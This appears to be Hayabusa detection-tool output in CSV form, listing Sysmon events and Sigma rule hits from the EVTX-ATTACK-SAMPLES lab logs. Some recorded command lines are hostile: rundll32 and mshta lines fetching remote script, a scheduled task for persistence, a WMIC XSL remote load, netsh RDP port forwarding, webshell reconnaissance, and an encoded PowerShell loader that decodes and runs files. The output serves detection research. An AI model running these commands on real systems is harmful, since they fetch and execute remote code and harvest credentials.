2019-05-21 09:35:10.161 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:12.705 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab : Path: C:\Program Files\Mozilla Firefox\firefox.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Mozilla Firefox\firefox.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Script in CommandLine,,rules/sigma/process_creation/win_pc_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true);",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 13:02:11.307 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:1600 CREDAT:275470 /prefetch:2",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_driveby_cve-2018-15982_sysmon_1_10.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,informational,Process Creation,"Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0